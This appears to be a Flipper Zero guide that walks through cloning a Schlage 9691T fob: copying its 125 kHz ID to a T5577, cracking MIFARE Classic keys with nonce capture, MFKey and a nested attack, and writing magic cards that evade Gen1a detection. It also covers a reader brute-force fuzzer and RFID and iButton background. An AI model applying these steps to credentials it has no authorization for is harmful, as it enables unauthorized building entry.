(Optional) Combo key fob	❌ Optional	AliExpress/Amazon: search "T5577 + S50 combo key fob" or "dual frequency key fob 125kHz 13.56MHz"	$5–15	A single fob with BOTH 125 kHz T5577 + 13.56 MHz MIFARE S50 chips — lets you carry one clone fob instead of two separate cards

Which Magic Card to Buy?

Your Schlage 9691T's MIFARE Classic chip most likely has a 4-byte UID. That means a cheap Gen1a or Gen2 (CUID) card will work. Start with Gen1a ($1-3 each). If the Schlage reader rejects it (some do Gen1a detection), try Gen2. You'll verify the UID length when you do the first read in Part 2 below.

🗂️ Overview: The Plan

You'll clone this fob in two completely separate operations, because the fob has two completely separate chips:

Part 1: Clone the 125 kHz side (building common areas) — Takes 5 minutes, easy, no encryption to crack
Part 2: Clone the 13.56 MHz side (apartment door) — Takes 30 min to 2 hours, requires cracking MIFARE Classic keys

You can do them in either order. Part 1 is simpler, so let's start there for a quick win.

🔵 Part 1: Clone the 125 kHz Side (Building Entrance)

Difficulty: Easy | Time: 5 minutes | What you need: Flipper + fob + T5577 blank card

The 125 kHz chip in your 9691T has zero encryption. It broadcasts an ID number in the clear, like shouting your name across a room. Anyone with a reader can hear it. That makes this part trivially easy.

Step 1.1: Read the 125 kHz Chip

From the Flipper main menu, navigate to 125 kHz RFID — Press the center button on your Flipper to open the main menu. Use the d-pad to scroll down. Look for the item labeled "125 kHz RFID" (it has a key icon 🔑). Press the center button to enter.

Select "Read" — You'll see options like Read, Saved, Add Manually, Extra. Select Read and press center.

Place the fob on the BOTTOM EDGE of the Flipper — This is critical and different from NFC! The 125 kHz RFID antenna is at the bottom edge of the Flipper Zero (the short edge opposite from where the IR blaster is). Hold the fob against this bottom edge. NOT the center, NOT the back — the bottom edge. Think of it like dipping the Flipper into the fob.

Wait for detection (1-5 seconds) — The screen will show "Reading..." and then the detected protocol and ID. You'll see something like:

HID H10301
FC: 123 Card: 45678

or

EM4100
ID: 6A 01 23 45 67

Either is fine — the Flipper auto-detects the protocol.

Save it — Press the center button. The Flipper asks you to name it. Type something like Schlage_Building using the on-screen keyboard. Press Save.

Troubleshooting:

Nothing detected after 10+ seconds — You're probably holding the fob in the wrong spot. Remember: bottom edge for 125 kHz. Move the fob slowly along the bottom edge until it clicks. Also make sure you're in the RFID menu, not the NFC menu.
Detected as "Unknown" — Try "Extra → Read ASK" or "Extra → Read PSK" from the RFID menu. Some less-common protocols need manual selection.

Step 1.2: Write to T5577 Blank Card

Navigate to 125 kHz RFID → Saved — Find the card you just saved (Schlage_Building).

Select it and choose "Write" — Press center on the card name, then select Write from the options.

Place a blank T5577 card on the BOTTOM EDGE of the Flipper — Same position as reading: the T5577 goes against the bottom edge. The screen shows "Writing..."

Wait for "Write Success" — Takes 1-3 seconds. The T5577 card is now programmed with the exact same ID as your 9691T's 125 kHz chip.

Test it! — Go to your building's front door, parking garage gate, or wherever the 125 kHz side of the fob normally works. Tap your freshly-written T5577 card against the reader. It should work identically to the original fob.

✅ Part 1 Done!

You now have a clone of the building entrance side. Your T5577 card opens the same doors as the 125 kHz chip in the 9691T. This was the easy part. Now for the apartment door...

🟠 Part 2: Clone the 13.56 MHz MIFARE Classic Side (Apartment Door)

Difficulty: Advanced | Time: 30 min – 2 hours | What you need: Flipper + fob + access to your Schlage door reader + magic NFC card (for physical clone)

The 13.56 MHz chip is a MIFARE Classic 1K with Crypto-1 encryption. Unlike the 125 kHz side, the data is encrypted — you can't just read and copy it. You need to crack the encryption keys first. The good news: MIFARE Classic's encryption has been broken since 2008, and the Flipper has all the tools to exploit it. It just takes a few steps.

The goal: Recover all 32 keys (16 sectors × 2 keys each) so you can read every byte of data on the card, then write an exact copy to a magic card.

Step 2.1: Initial Read — Dictionary Attack — ⏱️ 1-5 minutes

Navigate to NFC → Read — From the Flipper main menu, go to NFC (📱 icon). Select Read.

Place the 9691T fob on the CENTER of the Flipper's BACK — Different position than the 125 kHz side! The NFC (13.56 MHz) antenna is in the center of the Flipper's back. Place the fob flat against the back of the Flipper, roughly centered. Hold steady.

Wait for detection — The Flipper shows "Reading..." then detects: MIFARE Classic 1K and displays the UID (e.g., UID: AB CD EF 12). Note whether the UID is 4 bytes or 7 bytes — you'll need this info when buying magic cards.

Dictionary attack runs automatically — The screen shows progress: Found keys: X/32, Sectors read: Y/16. The Flipper is trying 1700+ known default keys against every sector. Do NOT move the fob or press any buttons — let it run to completion. This takes 1-5 minutes.

Check the results — When done, you'll see the final count. For a Schlage system:

Likely result: Found keys: 0-8/32, Sectors read: 0-4/16 — Schlage systems typically use non-default keys, so expect partial or zero results from dictionary alone. This is normal! Continue to Step 2.2.

Lucky result: Found keys: 32/32, Sectors read: 16/16 — All default keys! Skip straight to Step 2.6 (Save). This is rare for Schlage but possible.

Save the partial read — Even if only some sectors were read, save it. Name it Schlage_Apartment. You'll build on this partial read in subsequent steps.

Step 2.2: Extract MF Keys — Capture Reader Nonces — ⏱️ 30 sec – 3 min

This is the key step (literally). You need to go to your actual Schlage door reader — the device mounted on or near your apartment door that you normally tap the fob against.

Navigate to NFC → Extract MF Keys — On the Flipper, go back to the NFC menu. Look for "Extract MF Keys" (on older firmware versions it might say "Detect Reader"). Select it.

Select your saved card — Choose Schlage_Apartment (the card you saved in Step 2.1). The Flipper will emulate this card's UID when talking to the reader.

Walk to your apartment door — Go to the Schlage reader on your door. This is usually a small rectangular pad, sometimes with a Schlage logo, where you normally tap your fob.

Hold the Flipper FLAT and CENTERED against the reader — Press the center of the Flipper's back directly against the Schlage reader. The NFC antenna is in the center — push it flush against the reader pad. Hold still.

Watch the screen — You'll see: Collecting nonces... and a counter incrementing. The Schlage reader is attempting to authenticate with what it thinks is your fob, and the Flipper is capturing the cryptographic handshake data.

What you might notice:

The reader may beep — that's normal, it's attempting a read
The reader LED may flash (red, green, or orange) — that's normal
The reader may actually open the door lock — this means the Schlage reader uses UID-only authentication (very insecure!). If this happens, cloning is even easier — just the emulation from Step 2.1 might be enough.

Collect 5-10+ nonces, then press Back — Hold the Flipper against the reader for at least 10-15 seconds. The more nonces, the better your chances of cracking all keys. You'll see the nonce count increase on screen. When you've collected enough (or the screen says "Nonce collection complete"), press the Back button. The nonces are auto-saved to the SD card.

Troubleshooting:

0 nonces captured — Wrong position. The Schlage reader antenna might be at the top or bottom of the pad, not the center. Try moving the Flipper slowly across the face of the reader. Also ensure you selected the right saved card.
Reader doesn't react at all — The reader might be powered down, or it might be a Bluetooth-only Schlage lock (like Schlage Encode) which doesn't use NFC at all. Verify that your fob actually works on this reader.
Only 1-2 nonces even after 30 seconds — Some readers authenticate slowly. That's OK — even 1-2 nonces can yield keys. Proceed to Step 2.3.

Step 2.3: Crack Keys with MFKey — ⏱️ 30 sec – 30 min

Navigate to Main Menu → Applications → NFC → MFKey — Open the MFKey app. It may also be under Main Menu → NFC → MFKey depending on your Momentum version.

Press OK to start cracking — MFKey automatically finds the nonce data from Step 2.2 and begins the mathematical key recovery.

Wait — The screen shows: Cracking sector X... and then displays found keys. This can take 30 seconds to 30 minutes. For Schlage nonces, expect 1-5 minutes typically.

Check results — Found X new keys. These are automatically added to your key dictionary. If 0 keys found: go back to Step 2.2 and collect more nonces (hold longer, try different positions on the reader).

Step 2.4: Read Again — ⏱️ 1-5 minutes

Go to NFC → Read — Same as Step 2.1.

Place the 9691T fob on the Flipper's back (centered) — The dictionary attack runs again, now with your cracked keys included.

Check the progress — You should see more keys and sectors than before. Example: went from 2/32 keys to 14/32 keys.

All 32/32 keys and 16/16 sectors?
→ YES: 🎉 Skip to Step 2.6!
→ NO: Repeat Steps 2.2 → 2.3 → 2.4. Each round recovers more keys.
→ STUCK (same numbers after 2-3 rounds): Try the Nested Attack in Step 2.5.

Patience

For Schlage 9691T fobs, most people need 2-5 rounds of Extract MF Keys → MFKey → Read to recover all 32 keys. This is normal. Each round at the door takes about 30 seconds. The whole process typically takes 20-60 minutes including walking back and forth.

Step 2.5: Nested Attack (If Stuck) — ⏱️ 1-10 minutes

If you have some keys but repeating Steps 2.2-2.4 isn't finding more, the Nested Attack can fill in the gaps.

Navigate to Apps → NFC → Mifare Nested — This is a different app from MFKey.

Select your Schlage_Apartment card file — The app needs a card that has at least one known key.

Place the original 9691T fob on the Flipper (back, centered) — The Nested Attack communicates with the live chip to perform the attack.

Let it run (1-10 minutes) — The app uses known keys to mathematically derive unknown keys by exploiting a second weakness in Crypto-1.

Read one final time — NFC → Read the fob again. With dictionary + mfkey32 + nested keys, you should now have 32/32 keys and 16/16 sectors fully read.

Step 2.6: Save the Complete Card Dump — ⏱️ 10 seconds

Save when prompted — After a full read (32/32 keys, 16/16 sectors), the Flipper asks to save. Name it Schlage_Apartment (overwrite the old partial file or use a new name like Schlage_Apt_Full).

File location — Saved to /ext/nfc/Schlage_Apartment.nfc on the SD card. This file contains the complete card dump: all 16 sectors of data, all 32 keys, and the UID. This is everything you need.

Step 2.7: Test — Emulate on Flipper — ⏱️ 5 seconds

Navigate to NFC → Saved → Schlage_Apartment → Emulate — The Flipper now pretends to be your 9691T's MIFARE Classic chip.

Hold the Flipper against the Schlage door reader — Center of the Flipper's back against the reader, flat and flush. Try different angles if it doesn't work on the first try. The NFC antenna sweet spot is the center.

If the door opens: 🎉 SUCCESS! — Emulation works! You can stop here if you're happy using the Flipper as your key. To also make a physical card clone, continue to Step 2.8.

If the door doesn't open: Flipper emulation can be too slow for some Schlage readers. Don't worry — a physical magic card (Step 2.8) has a much higher success rate because it uses real MIFARE silicon.

Step 2.8: Write to Magic NFC Card — ⏱️ 30 seconds

Get your magic card ready — A Gen1a, Gen2 (CUID), or Gen4 UID-changeable MIFARE Classic 1K card. If your fob's UID was 4 bytes, Gen1a or Gen2 works. If 7 bytes, you need Gen4.

Navigate to NFC → Saved → Schlage_Apartment → Write — Select the Write option.

Place the magic card on the center of the Flipper's back — Same position as reading. The Flipper writes ALL sector data (all 16 sectors, all keys, all block data) PLUS the UID to the magic card.

"Write Success" — Takes 5-15 seconds. Your magic card is now an exact byte-for-byte clone of the 9691T's MIFARE Classic chip.

Test at your apartment door — Tap the magic card against the Schlage reader. It should unlock the door exactly like the original fob.

Troubleshooting the magic card:

Reader rejects the magic card — If you used Gen1a and the reader does Gen1a detection (sends a magic wakeup command), the reader knows it's a clone. Try a Gen2 (CUID) card — these are not detectable by the Gen1a detection method.
Write failed — Bad magic card or wrong type. Try another card from the pack. Make sure it's actually a UID-changeable card, not a regular MIFARE Classic (which has read-only Block 0).
Everything written but door still doesn't open — Double-check that all 32 keys were recovered (re-read the original fob and verify 32/32). If some sectors were partially read, the clone will be incomplete.

✅ Part 2 Done!

You now have a full clone of the apartment door side. Between Part 1 (T5577 for building entrance) and Part 2 (magic NFC card for apartment), you've fully cloned the Schlage 9691T.

🎯 What You End Up With

Clone Method	What Opens	Pros	Cons
Flipper Emulation (RFID)	Building entrance, garage, common areas	No extra cards needed, always with you	Need to navigate Flipper menus each time
T5577 Card	Building entrance, garage, common areas	Just tap and go, works like original	Extra card to carry
Flipper Emulation (NFC)	Apartment door	No extra cards needed	May not work on some picky Schlage readers
Magic NFC Card	Apartment door	100% hardware compatibility, just tap	$2-5 per card
T5577 + S50 Combo Fob	BOTH building entrance AND apartment door	Single fob replaces both functions	$5-15, need to write both sides

🔧 Troubleshooting Reference

Problem	Likely Cause	Solution
NFC read detects nothing	Fob positioned wrong	NFC antenna is CENTER of Flipper's back — hold fob flat and centered
RFID read detects nothing	Fob positioned wrong	RFID antenna is BOTTOM EDGE of Flipper — hold fob against the short bottom edge
0 keys after dictionary attack	Non-default keys (normal for Schlage)	Continue to Extract MF Keys step — the real keys come from the door reader
0 nonces from Extract MF Keys	Bad positioning on reader	Move Flipper slowly across the reader face, try different positions
MFKey finds 0 new keys	Not enough nonces, or corrupted capture	Go back and collect more nonces — hold Flipper against reader for longer
Stuck at partial keys after 3+ rounds	Some sectors need nested attack	Use Apps → NFC → Mifare Nested with the live fob on the Flipper
Emulation doesn't open the door	Reader timing too strict for emulation	Use a physical magic card (Gen1a/Gen2/Gen4) instead
Magic card rejected by reader	Gen1a detection by reader	Switch to Gen2 (CUID) or Gen4 card
Door opened during Extract MF Keys	Reader uses UID-only auth (very insecure)	Good news: cloning is easier! Just UID emulation may be enough — save and emulate
T5577 doesn't work at building entrance	Wrong protocol written, or reader is NFC not RFID	Re-read the original fob with RFID → Read, verify protocol, re-write T5577

💡 Tips & Tricks

Antenna positions matter most — This is the #1 source of failed attempts. Remember: NFC = center back, RFID = bottom edge. Getting this wrong wastes time.
Don't interrupt the dictionary attack — Let it run all the way through. It tries every key in the dictionary. Interrupting means you miss potential key matches.
More nonces = better — When at the door reader, collect as many nonces as you can. 10+ nonces is ideal. More data gives MFKey more chances to crack each key.
The combo fob option is slick — If you buy a "T5577 + MIFARE S50" dual-frequency fob, you can write BOTH the 125 kHz and 13.56 MHz data to a single fob. One fob for everything, just like the original 9691T.
Keep your original fob safe — Don't lose it until you've verified your clones work everywhere. If you need to re-read or re-do any steps, you'll need the original.
Check the .nfc file — The saved file at /ext/nfc/Schlage_Apartment.nfc is a text file. You can open it on a computer via the SD card. Look for UID: to check byte length, and Key A: / Key B: lines to verify all 32 keys were recovered. Any line with ?? means that key wasn't cracked yet.

Legal Reminder

Only clone access cards that belong to you or that you have explicit authorization to duplicate. Cloning someone else's access card without permission is illegal. This guide is for cloning your own apartment fob.

🔑 125 kHz RFID

Beginner🐬🐬🐬🐬

Low-frequency RFID for building access cards, hotel keys, and animal tracking chips. Simpler than NFC — most 125 kHz cards have zero encryption, making them trivially copyable. This section covers how the technology works, every supported protocol, the universal T5577 blank card, and real security implications.

🔬 How 125 kHz RFID Actually Works

⚡ The Physics — Electromagnetic Coupling at 125 kHz

Beginner

▼

125 kHz RFID uses electromagnetic induction — the same principle as a wireless phone charger, but instead of transferring power to charge a battery, it transfers just enough power to wake up a tiny chip and make it broadcast its ID.

How the Read Process Works

The reader (or the Flipper) generates a 125 kHz electromagnetic field from its antenna coil

When a passive RFID tag enters this field (within ~5-10 cm), the field induces a current in the tag's antenna coil — powering the chip with no battery

The chip wakes up and modulates the field by changing its antenna's load. This creates tiny ripples in the field that the reader detects.

These ripples encode the tag's ID number — transmitted as a simple bitstream using ASK (Amplitude Shift Keying) or FSK/PSK modulation

The reader decodes the bitstream and extracts the ID. That's it — no encryption, no challenge-response, no mutual authentication. Just a number broadcast in the clear.

125 kHz vs NFC (13.56 MHz) — Key Differences

Property	125 kHz RFID	13.56 MHz NFC
Read Range	5–10 cm (up to 30cm+ with directional antenna)	1–4 cm typical
Encryption	None (tag just broadcasts ID)	Optional (Crypto1, DESFire AES, etc.)
Complexity	Simple — ID only	Complex — sectors, keys, apps
Speed	Slow (low data rate)	Fast (high data rate)
Flipper Hardware	Software-defined on MCU (no dedicated chip!)	ST25R3916 NFC IC
Antenna Location	Bottom edge of Flipper	Center back of Flipper
Cost Per Tag	$0.10–0.50	$0.30–2.00

Interesting Detail

The Flipper's 125 kHz RFID implementation is entirely software-defined — there's no dedicated RFID chip. The STM32WB55 microcontroller directly drives the antenna coil and samples the response using its ADC and timers. This is an impressive engineering achievement that keeps the BOM cost down while supporting 20+ protocols.

📻 Built-in Features

📖 Read — Auto-Detect & Read

Beginner

▼

Place any 125 kHz card/fob on the bottom edge of the Flipper. It auto-detects the protocol and reads the ID.

Detection takes 1-5 seconds depending on card type
Shows protocol name, ID number, and raw data
Save to SD card for later emulation or cloning
Antenna is on the bottom edge — NOT the back like NFC

Tip

If Read doesn't detect anything, try Read → Extra → Read ASK or Read PSK for less common modulation types. Some protocols use PSK (Phase Shift Keying) instead of the default ASK.

📤 Saved — Emulate Tags

Beginner

▼

Emulate any saved 125 kHz card. Flipper generates the exact radio response a real card would.

Place Flipper directly on the reader (close contact required for 125 kHz)
Emulation starts immediately — Flipper modulates its antenna coil to mimic the tag
Works with all supported protocols
Multiple cards saved on one Flipper = all your access cards in one device

Note

125 kHz read range is shorter than NFC. You need to be within 1-3 cm of the reader. Hold the Flipper's bottom edge against the reader. Some readers need a specific angle — try rotating slowly.

✏️ Add Manually

Intermediate

▼

Create RFID tags from known data without reading a physical card. Enter protocol, ID, and data manually.

Select protocol from the full list (EM4100, HID, Indala, etc.)
Enter the ID value in the expected format
Useful when you know the ID from documentation, database dumps, or other tools
Saves like a normal read — can emulate or write to T5577

🎲 LFRFID Fuzzer (Momentum)

Advanced🐬🐬🐬

▼

Brute force RFID readers by emulating cards with random or sequential UIDs. Tests how access control systems respond to unknown cards.

Select protocol (EM4100, HID, etc.)
Choose attack type: random UIDs, sequential, or custom range
Flipper rapidly emulates cards while you hold it to the reader
If the reader opens — you found a valid ID

Attack Types

Mode	Description	Speed
Sequential	Tries IDs in order (0001, 0002, 0003...)	Slow but thorough
Random	Tries random IDs from full range	Good for testing reader behavior
Custom Range	IDs within a specific range you define	Fastest if you know the ID range

Warning

This generates hundreds of failed authentication attempts. Most security systems will log these. Some may trigger lockout or alarm. Only test systems you own or have explicit authorization to test.

📊 Raw Read / Emulate (Momentum)

Advanced🐬🐬

▼

Capture and replay raw modulation data without protocol decoding. Similar to Sub-GHz Read RAW — records the exact modulation pattern.

Useful for unknown or unsupported 125 kHz protocols
Captures ASK or PSK modulation patterns
Can be replayed directly — Flipper reproduces the exact modulation
Good for analysis: export the raw data and examine the bitstream

📋 125 kHz RFID Protocol Encyclopedia

🔑 Complete Protocol Encyclopedia — All 24 Protocols

Intermediate

▼

Every 125 kHz RFID protocol supported by Flipper Zero + Momentum firmware. None of these have encryption — every tag just broadcasts its ID in the clear.

Showing all 24 protocols

Protocol	Bits	Security	Cloneable	Common Uses
EM4100	64 (40-bit ID)	🔴 None	✅ T5577	Most common worldwide — generic access cards, hotel key cards, gym fobs
EM4100/32	32	🔴 None	✅ T5577	32-bit variant of EM4100
EM4100/16	16	🔴 None	✅ T5577	16-bit variant of EM4100
HID H10301	26 (Wiegand)	🔴 None	✅ T5577	HID ProxCard II — most widely deployed access system in North America. Corporate offices, universities.
HID ProxII Generic	Various	🔴 None	✅ T5577	Extended HID formats beyond 26-bit. Corporate access, government.
HID Corporate 1000	35	🔴 None	✅ T5577	Large enterprise HID deployments
Indala 26	26	🔴 None	✅ T5577	Motorola/HID Indala format — government buildings, military facilities, secure sites
AWID	26	🔴 None	✅ T5577	Applied Wireless ID — corporate access control
FDX-A	—	🔴 None	✅ T5577	ISO 11784 animal identification (older standard)
FDX-B	128	🔴 None	✅ T5577	ISO 11785 animal identification — pet microchips (dogs, cats), livestock tracking. Read your pet's chip ID!
Kantech ioProx	26/36	🔴 None	✅ T5577	Kantech access control systems
Viking	—	🔴 None	✅ T5577	Viking access control systems
Jablotron	40	🔴 None	✅ T5577	Czech security alarm systems
Paradox	44	🔴 None	✅ T5577	Paradox security systems
PAC/Stanley	—	🔴 None	✅ T5577	PAC International access control (UK, Europe)
Keri	—	🔴 None	✅ T5577	Keri Systems access control
GProxII	36	🔴 None	✅ T5577	Guardall ProxII security systems
Gallagher	—	🔴 None	✅ T5577	Gallagher security — very common in New Zealand and Australia
Pyramid	26	🔴 None	✅ T5577	Farpointe Data access control
NexWatch	—	🔴 None	✅ T5577	Honeywell NexWatch access control
Securakey	—	🔴 None	✅ T5577	Securakey access control systems
Noralsy	—	🔴 None	✅ T5577	French access control systems
EM-Micro EM4305	—	🔴 None	✅ T5577	Programmable transponder (similar to T5577 but from EM Microelectronic)
IdTeck	26	🔴 None	✅ T5577	Korean access control systems

The Brutal Truth

Every single 125 kHz RFID protocol has 🔴 None security. There is no encryption, no challenge-response, no authentication. The tag simply broadcasts its ID when powered by any reader field. Anyone with a $3 reader can clone any card in seconds. The only "security" is physical proximity to the card.

💻 CLI Commands

Command	Description	Example
`rfid read`	Read any 125 kHz card	`rfid read normal`
`rfid write`	Write data to a T5577 card	`rfid write EM4100 6A01234567`
`rfid emulate`	Emulate an RFID tag	`rfid emulate EM4100 6A01234567`
`rfid raw_read`	Read raw modulation data	`rfid raw_read ask /ext/rfid/raw.rfid`
`rfid raw_emulate`	Emulate raw data	`rfid raw_emulate /ext/rfid/raw.rfid`

💳 T5577: The Universal Blank Card

💳 T5577: The Universal 125 kHz Blank Card

Beginner🐬🐬🐬🐬

▼

The T5577 (also called T5567/T55x7) is a programmable 125 kHz RFID transponder that can emulate virtually any 125 kHz protocol. It's the "magic card" equivalent for low-frequency RFID — and after 20+ years, nothing has superseded it.

What Makes It Special

Can be programmed to emulate EM4100, HID, Indala, AWID, Paradox, FDX-B, Gallagher, and many more
Re-writable unlimited times — clone one card today, a different card tomorrow
Costs $0.50–2 per unit on AliExpress, Amazon, or lab401.com
Available as cards, keyfobs, wristbands, stickers, and implantable capsules
Has been the universal RFID blank since the early 2000s — still unmatched

Memory Architecture

Understanding T5577's blocks helps when troubleshooting failed clones:

Block 0

⚙️ ConfigurationModulation, bit rate, data blocks, max block

Block 1

📦 DataID data (first 32 bits)

Block 2

📦 DataID data (continued)

Block 3

📦 DataExtended data (if needed)

Block 4–6

📦 DataAdditional storage (protocol-dependent)

Block 7

🔒 PasswordOptional write protection (32-bit password)

Block 0 is the key — it configures the modulation type (ASK, FSK, PSK), bit rate, and how many data blocks to transmit. When the Flipper writes a protocol to a T5577, it sets Block 0 to match that protocol's parameters. When programmed as EM4100, a T5577 IS an EM4100 card to any reader.

How to Clone

Read the original card — RFID → Read. Hold the card on the Flipper's bottom edge.

Save it to your SD card with a descriptive name

Go to Saved → [your card] → Write

Place the blank T5577 on the Flipper's bottom edge. Wait for the "Success" confirmation (takes 1-2 seconds).

# CLI method
rfid read normal                           # Read the original card
rfid write EM4100 6A01234567              # Write EM4100 ID to T5577
rfid write HID_ProxII 000CA80F            # Write HID format to T5577

Where to Buy

Form Factor	Price Range	Best For
Standard card (ISO)	$0.50–1.50 ea	Building access, wallet carry
Keyfob	$0.50–2 ea	Keychain carry, gym/pool
Wristband	$1–3 ea	Hands-free access
Sticker/Coin tag	$0.30–1 ea	Stick inside phone case or badge
Dual-frequency fob (T5577 + MIFARE)	$5–15 ea	Buildings with both 125 kHz and NFC readers

Where to Buy

Search Amazon for "T5577 RFID card writable" or "T5577 keyfob". AliExpress has the best prices ($0.30–0.80 per card in bulk). Lab401.com specializes in security testing gear. Important: make sure they specify T5577 chip — avoid "EM4100 cards" which are read-only pre-programmed tags.

🎯 Novel & Creative RFID Uses

🐾

Read Your Pet's Microchip

Pet microchips use FDX-B (ISO 11785). Hold your dog or cat near the Flipper's bottom edge — it reads the implanted 15-digit ID number. Verify your pet's registration info matches.

🐬🐬🐬🐬

🏢

Consolidate Access Cards

Read all your building access cards (office, gym, parking) and save them on one Flipper. Switch between emulated cards instead of carrying a stack of fobs.

🐬🐬🐬🐬🐬

🏨

Read Hotel Key Cards

Many budget hotels still use 125 kHz EM4100 cards. Read yours to see what protocol it uses. Some can be backed up to a T5577 in case you lose the original.

🐬🐬🐬

🅿️

Clone Parking Garage Cards

Many parking garages use simple EM4100 or HID cards. Clone to a T5577 as a backup, or transfer to a more convenient form factor (keyfob instead of card).

🐬🐬🐬🐬

🔍

Identify Unknown Cards

Got a card and don't know what it's for? Hold it to the Flipper — it'll tell you the protocol, ID, and raw data. Quick way to figure out if it's 125 kHz or you need NFC.

🐬🐬🐬

🚗

Vehicle Immobilizer Analysis

Some older cars (pre-2005) use 125 kHz transponders in the key for immobilizer verification. The Flipper can read these transponder IDs for analysis.

🐬🐬

🛡️ Security Assessment — Why 125 kHz RFID Is Broken

⚠️ The State of 125 kHz Security

Beginner

▼

125 kHz RFID access control is fundamentally broken from a security standpoint. Here's why:

🔴 Zero Encryption

The tag broadcasts its ID in plaintext. No challenge-response, no session keys, no mutual authentication. It's like a password written on the front of the card.

🔴 Trivial Cloning

Anyone with a $3 handheld cloner (available on AliExpress/Amazon) can read and clone any 125 kHz card in under 5 seconds. No technical skill required.

🔴 Extended Read Range

While normal read range is 5-10 cm, attackers with directional or amplified antennas can extend this to 30+ cm — enough to read a card in someone's pocket or bag.

🟡 No Tamper Detection

Readers can't tell the difference between an original card and a clone. There's no way to detect that a card has been duplicated.

🟡 Widespread Deployment

Despite being broken, 125 kHz systems are still the most common access control in budget buildings, apartment complexes, gyms, and parking garages worldwide.

💡 Upgrade Path

Secure alternatives exist: HID iCLASS SE (13.56 MHz + encrypted), SEOS (PKI-based), MIFARE DESFire EV2/EV3 (AES-128), or mobile credentials (phone-based BLE/NFC).

Bottom Line

If your building uses 125 kHz RFID as its only access control, it has effectively no security beyond "you need to be physically near someone's card for a few seconds." This is a known, accepted reality in the security industry. If security matters, migrate to 13.56 MHz with encryption (DESFire or SEOS).

🗝️ iButton — The Contact Key That's Everywhere

Intermediate🐬🐬

A coin-shaped metal key containing a tiny microchip. Also called "Dallas Touch Memory" or "contact memory" — used in apartment intercoms, building access, elevators, and parking garages worldwide. Not magnetic, despite what everyone calls them. The Flipper can read, emulate, write, and fuzz all three iButton protocols.

🔍 What is iButton?

Beginner

▼

iButton is a stainless steel coin (~16mm diameter) that contains a tiny chip with a unique ID. It was invented by Dallas Semiconductor (now Maxim/Analog Devices) and is extremely common in Europe, Russia, and parts of Asia and South America for building access.

Physical Contacts

Center pad = DATA+ (signal line)
Outer ring = GND (ground)
Just two contacts — that's all it takes

         ┌─────────────────────────┐
         │      Stainless Steel     │
         │   ┌─────────────────┐   │
         │   │    Microchip    │   │
         │   │   (8-byte ID)   │   │
         │   └─────────────────┘   │
         │            │            │
         ├────────────┼────────────┤
         │   GND     │  DATA+  GND │
         └────────────┴────────────┘
           Outer     Center    Outer
           Ring       Pad      Ring

         ⌀ ~16mm  •  No battery  •  Powered by reader

Where You'll Find Them

Apartment intercoms and building entrances
Elevator access control
Parking garages and gates
Hotel room locks (older systems)

Beyond Access Control

DS18B20 — temperature sensors (same 1-Wire protocol)
DS1904 — real-time clocks
DS1963S — SHA-1 crypto iButtons (banking/vending)

Myth Buster

Despite being commonly called "magnetic keys," iButtons have zero magnetism. They're purely electrical contact devices. The confusion comes from their metal appearance and the way you press them against readers.

⚡ How It Physically Works

Beginner

▼

The key has no battery — it's entirely powered by the reader the instant you make contact.

You press the key against the reader. Two metal surfaces touch: center pad → data line, outer rim → ground.

The reader provides 2.8–6V power through a 1kΩ pull-up resistor on the data line.

The chip inside wakes up instantly and announces its presence with a "presence pulse."

The reader sends a ROM command asking for the ID.

The chip transmits its 8-byte ID over the same single wire — family code + serial + CRC.

The reader checks the ID against its database. If it matches — the door opens. Total time: ~10–20ms.

Key Insight

Everything happens over one wire. Power, data in, data out — all on a single conductor. This is the 1-Wire protocol, and it's why iButton only needs two contacts (data + ground).

📡 The 1-Wire Protocol

📊 1-Wire Protocol — How Data Moves on One Wire

Intermediate

▼

The 1-Wire protocol is beautifully minimal. A single wire handles power delivery AND bidirectional data using precise timing of voltage pulses.

The Roles

Master (reader) — initiates all communication, provides power
Slave (key/sensor) — responds only when spoken to

Data Encoding: It's All About Timing

Data bits are encoded by how long the line is pulled low:

Reset pulse: Master pulls line low for 480μs → slave responds with a "presence pulse" (I'm here!)
Write 0: Pull low for 60μs (long = zero)
Write 1: Pull low for <15μs then release (short = one)
Read: Master pulls low briefly, slave either holds low (0) or lets it float high (1)

   Communication Sequence

  Reader (Master)              Key (Slave)
     │                            │
     │── Reset (480μs low) ──────▶│
     │                            │
     │◀── Presence Pulse ─────────│  "I'm here"
     │                            │
     │── ROM Command 0x33 ──────▶│  "Tell me your ID"
     │                            │
     │◀── 8 bytes: ID data ──────│  family + serial + CRC
     │                            │
     │── Match/Skip ROM ────────▶│  (for data commands)
     │                            │

Timing Windows

Operation	Duration	What Happens
Reset	480μs low	Master resets bus, all slaves listen
Presence	60–240μs low	Slave pulls low to say "I exist"
Write 1	<15μs low	Short pulse = logical 1
Write 0	60μs low	Long pulse = logical 0
Read slot	~60μs total	Master samples at 15μs mark
Full ID transfer	~10–20ms	Reset + ROM cmd + 64 bits

Parasitic Power

When the data line is high (idle), the slave chip charges an internal capacitor. This stored energy powers the chip during low pulses when the line is pulled to ground. No battery needed — ever.

🧬 The 8-Byte Data Format

Intermediate

▼

Every Dallas iButton transmits exactly 8 bytes (64 bits):

Byte:    1        2-7              8
       ┌──────┬─────────────────┬──────┐
       │ 0x01 │ A4 56 78 9B CD EF │ 0x3A │
       └──────┴─────────────────┴──────┘
        Family    Serial Number      CRC-8

Breakdown

Byte 1 — Family Code: Identifies the chip type. 0x01 = DS1990A (most common access key)
Bytes 2–7 — Serial Number: 48-bit unique ID. 281 trillion possible combinations.
Byte 8 — CRC-8: Dallas polynomial checksum. Catches transmission errors.

Common Family Codes

Code	Chip	Purpose
`0x01`	DS1990A	Serial number iButton (access control)
`0x09`	DS1982	1 Kbit EPROM memory
`0x10`	DS18S20	Temperature sensor
`0x28`	DS18B20	Temperature sensor (most common)
`0x22`	DS1822	Econo temperature sensor
`0x33`	DS1963S	SHA-1 protected iButton

Practical Tip

When Flipper reads an iButton, it shows the full 8-byte hex string. If you see 01 as the first byte — that's a standard DS1990A access key. This is what 95% of building intercoms use.

🔀 Three iButton Protocols

📋 Dallas vs Cyfral vs Metakom — Protocol Comparison

Intermediate

▼

Not all iButtons speak the same language. There are three distinct protocols, and the Flipper supports all of them.

Protocol	Origin	Key Length	Encoding	Common In
Dallas	USA (Maxim/Dallas Semi)	8 bytes	1-Wire digital	Worldwide
Cyfral	Russia	2 bytes	Resistance-based	Russia, CIS
Metakom	Russia	4 bytes	Resistance + parity	Russia, CIS

Dallas (DS1990A)

The global standard — used almost everywhere iButtons exist
Uses the 1-Wire digital protocol described above
Cheapest to clone — writable blanks cost $0.50–1 each
Zero encryption, zero authentication — just an ID number

Cyfral

Russian-developed protocol using current/resistance instead of voltage levels
Only 2 bytes (16 bits) — far fewer possible IDs
